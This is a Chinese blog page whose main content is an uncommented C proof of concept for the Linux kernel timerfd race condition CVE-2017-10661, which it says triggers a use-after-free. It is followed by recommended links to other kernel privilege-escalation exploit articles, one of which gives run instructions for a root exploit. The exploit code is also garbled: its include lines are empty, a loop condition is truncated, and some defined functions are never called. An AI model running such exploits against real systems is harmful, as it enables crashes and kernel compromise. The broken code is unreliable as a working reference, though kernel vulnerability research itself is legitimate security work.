linux内核竞争条件漏洞,CVE-2017-10661

最新推荐文章于 2021-05-16 09:20:56 发布
最新推荐文章于 2021-05-16 09:20:56 发布
阅读量514 收藏
点赞数
文章标签: linux内核竞争条件漏洞

/*

* PoC for CVE-2017-10661, triggers UAF with KASan enabled in kernel 4.10

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define RACE_TIME 1000000

int fd;

int fd_dumb;

int count=0;

void* list_add_thread(void* arg){

int ret;

struct itimerspec new ={

.it_interval={

.tv_sec=100,

.tv_nsec=100

},

.it_value={

.tv_sec=100,

.tv_nsec=100

}

};

int i=0;

while(i<1){

ret=timerfd_settime(fd,3,&new,NULL);

if(ret<0){

perror("timerfd settime failed !");

}

i++;

}

return NULL;

}

void* list_del_thread(void* arg){

int ret;

struct itimerspec new ={

.it_interval={

.tv_sec=100,

.tv_nsec=100

},

.it_value={

.tv_sec=100,

.tv_nsec=100

}

};

int i=0;

while(i<1){

ret=timerfd_settime(fd,1,&new,NULL);

if(ret<0){

perror("timerfd settime failed !");

}

i++;

}

return NULL;

}

int post_race()

{

int ret;

struct itimerspec new ={

.it_interval={

.tv_sec=100,

.tv_nsec=100

},

.it_value={

.tv_sec=100,

.tv_nsec=100

}

};

int i=0;

struct timeval tv={

.tv_sec = 120+count*2,

.tv_usec = 100

};

ret=settimeofday(&tv,NULL);

if(ret<0){

perror("settimeofday");

}

return 0;

}

int do_race(){

int ret_add[2];

int i;

int j;

pthread_t th[2]={0};

i=0;

while(i

if(i%128)

printf("%d\n",i);

fd=timerfd_create(CLOCK_REALTIME,0); // create the victim ctx

if(fd<0){

perror("timerfd craete failed!");

return -1;

}

ret_add[0] = pthread_create(&th[0],NULL,list_add_thread,(void*)1);

ret_add[1] = pthread_create(&th[1],NULL,list_add_thread,(void*)2);

for( j=0;j<2;j++){

pthread_join(th[j],NULL);

}

close(fd);

usleep(150000);

i++;

count++;

}

return 0;

}

int main(int argc, char const *argv[])

{

int ret;

// add dumb ctx

void* area;

void* base;

struct itimerspec new ={

.it_interval={

.tv_sec=100,

.tv_nsec=100

},

.it_value={

.tv_sec=100,

.tv_nsec=100

}

};

fd_dumb = timerfd_create(CLOCK_REALTIME,0);

ret=timerfd_settime(fd_dumb,3,&new,NULL);

if(ret<0){

perror("timerfd settime failed !");

}

ret=do_race();

if(ret <0){

puts("race failed!");

goto error_end;

}

sleep(5);

error_end:

close(fd);

exit(1);

}

weixin_39945795
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
【kernel exploit】CVE-2017-10661 链表漏洞与TOCTTOU——任意地址写
panhewu9919的博客
04-01 963
【kernel exploit】CVE-2017-10661 链表漏洞与TOCTTOU——任意地址写 影响版本:Linux 2.6.27~4.10.14 4.10.15已修补,通过syzkaller发现。 7.0分 测试版本:Linux-4.10.14 测试环境下载地址 编译选项: CONFIG_SLAB=y General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB $ wget https:/
链表游戏:CVE-2017-10661之完全利用
omnispace的博客
05-29 854
原文来自安全客,作者:huahuaisadog@360 Vulpecker Team原文链接:https://www.anquanke.com/post/id/129468最近在整理自己以前写的一些Android内核漏洞利用的代码,发现了一些新的思路。CVE-2017-10661的利用是去年CORE TEAM在hitcon上分享过的:https://hitcon.org/2017/CMT/slid...
linux 内核授权,Linux内核竞争条件漏洞预警,可致本地提权
weixin_42572602的博客
04-29 189
Linux (net/packet/af_packet.c)被发现条件竞争漏洞,此漏洞可用于从未授权进程中执行内核代码。攻击者只需要本地低权限,就能利用该漏洞致拒绝服务(系统崩溃)或者以管理员权限执行任意代码。这个BUG最早出现于2011年4月19号的代码中,详细参考在低权限命名空间可用的系统中(Ubuntu、Fedora等),可以通过未授权进程获取CAP_NET_RAW进而创建AF-PACKE...
linux内核提权,Linux内核漏洞(权限提升)实例
weixin_29740921的博客
04-29 211
这个内核漏洞相当的严重,只要用户拥有本地用户的权限便可以轻松的获取到管理员的权了。下图为我在自己的服务器上做的测试,果然针对目前绝大多数的linux内核漏洞!修复方法:一、如果您使用的是RedHa tEnterprise Linux 4/5的系统或Centos4/5的系统,您可以通过下面的操作简单的操作防止被***。在/etc/modprobe.conf文件中加入下列内容:install pppo...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
cve-2019-11477--2019-06-17-1629.sh
06-27
Linux 内核TCP “SACK Panic” 远程拒绝服务漏洞-cve-2019-11477 检测脚本。
008.利用堆大小差一错误爆破Linux内核-008.CVE-2016-6187 Exploiting Linux kernel
08-04
总结来说,CVE-2016-6187是一个由于边界检查不充分而导致的堆溢出漏洞,它影响了使用特定版本Linux内核且使用AppArmor的系统。利用这个漏洞需要对Linux内核、内存管理和安全模型有深入的理解,以及精心设计的攻击...
Linux内核漏洞浅析
09-16
Linux内核漏洞浅析
linux提权工具利用2.6内核漏洞
12-27
wunderbar_emporium-3.tgz linux提权工具 linux提权 2.6内核漏洞
linux内核竞争条件漏洞,Linux内核竞争条件漏洞-导致远程代码执行
weixin_35223524的博客
05-10 109
原标题:Linux内核竞争条件漏洞-导致远程代码执行本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。运行了Linux发行版的计算机设备,如果内核版本小于5.0.8的话,将有可能受到一个内核竞争条件漏洞的影响,并导致系统无法抵御远程网络攻击。潜在的攻击者可以利用Linux内核中net/rds/tcp.c的rds_tcp_kill_so...
linux竞争漏洞,Linux Kernel 本地竞争条件漏洞
weixin_29728529的博客
05-16 251
Linux Kernel是开放源码操作系统Linux所使用的内核,存在locks_remove_flock()本地竞争条件漏洞。受影响系统:Linux kernel 2.6.x不受影响系统:Linux kernel 2.6.25.6描述:--------------------------------------------------------------------------------B...
linux补丁 CVE漏洞补丁,深入解读补丁分析发现的linux内核提权漏洞(CVE-2017–1000405)...
weixin_42361175的博客
05-16 1103
作者:rain预估稿费:400投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿1. 前言近日(2017.11.30)国外安全团队Bindecy爆出名为大脏牛(Huge Dirty Cow)的内核提权漏洞,编号为CVE-2017–1000405。包含linux内核(2.6.38~4.14)的服务器,桌面,移动等众多设备将面临严重挑战,数以百万计的用户受到安全威胁。该漏洞是由于对...
cve2018 linux内核提权漏洞,【漏洞复现】Ubuntu本地提权漏洞CVE-2017-16995
weixin_32896083的博客
05-09 483
阅读:4,278近期看到了Ubuntu本地提权漏洞CVE-2017-16995, 所以自己在本地搭建了环境分析了一下,现在将该漏洞的成因、复现、修复方案进行简单的介绍。漏洞描述Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本(Ubuntu 16.04)存在本地提权漏洞漏洞编号为CVE-2017-1...
Linux内核竞争条件漏洞-导致远程代码执行
weixin_43724402的博客
08-10 444
本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 运行了Linux发行版的计算机设备,如果内核版本小于5.0.8的话,将有可能受到一个内核竞争条件漏洞的影响,并导致系统无法抵御远程网络攻击。 潜在的攻击者可以利用Linux内核中net/rds/tcp.c的rds_tcp_kill_sock TCP/IP实现缺陷,从而触发设备的拒绝服...
PWN2OWN 2017 Linux 内核提权漏洞分析
omnispace的博客
05-17 2388
0.前言 在2017年PWN2OWN大赛中,长亭安全研究实验室(Chaitin Security Research Lab)成功演示了Ubuntu 16.10 Desktop的本地提权。本次攻击主要利用了linux内核IPSEC框架(自linux2.6开始支持)中的一个内存越界漏洞CVE编号为CVE-2017-7184。 众所周知,Linux的应用范围甚广,我们经常使用的Androi
聚类算法-一种无监督学习方法.docx
最新发布
08-12
聚类算法是一种无监督学习方法,用于将数据集中的数据点自动分组到不同的类别中,这些类别也称为“簇”或“群”。聚类的目标是让同一簇内的数据点尽可能相似,而不同簇之间的数据点尽可能不相似。聚类算法广泛应用于多种领域,如数据挖掘、模式识别、图像分析、信息检索等。 聚类算法的基本概念 无监督学习:聚类算法不需要事先标记数据点的类别标签,而是根据数据本身的相似性来分组。 相似性度量:聚类算法依赖于某种相似性或距离度量来决定数据点之间的相似程度。常用的度量包括欧氏距离、曼哈顿距离等。 目标函数:大多数聚类算法都会尝试最小化某种目标函数,例如簇内的平方误差和(SSE)。 常见的聚类算法 K-Means K-Means 是一种原型聚类算法,它通过迭代地将数据点分配到最近的质心来形成簇,并重新计算每个簇的质心,直到质心不再显著变化为止。 在 Python 的 scikit-learn 库中,可以通过 KMeans 类实现 K-Means 聚类。 层次聚类 层次聚类构建一个树状图(称为树状图或 dendrogram),显示数据点是如何逐渐合并成簇的。 这种算法可以是凝聚型(自底向上)或分裂型(自顶向下)。
Linux内核TIPC漏洞CVE-2021-432671:堆溢出利用分析
在本文中,我们将深入探讨针对CVE-2021-432671的Linux内核TIPC子系统中的堆溢出漏洞CVE-2021-432671是一个在哨兵实验室公开的漏洞,涉及Linux内核中的TIPC(透明进程间通信服务),这是一种用于集群节点间数据传输...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值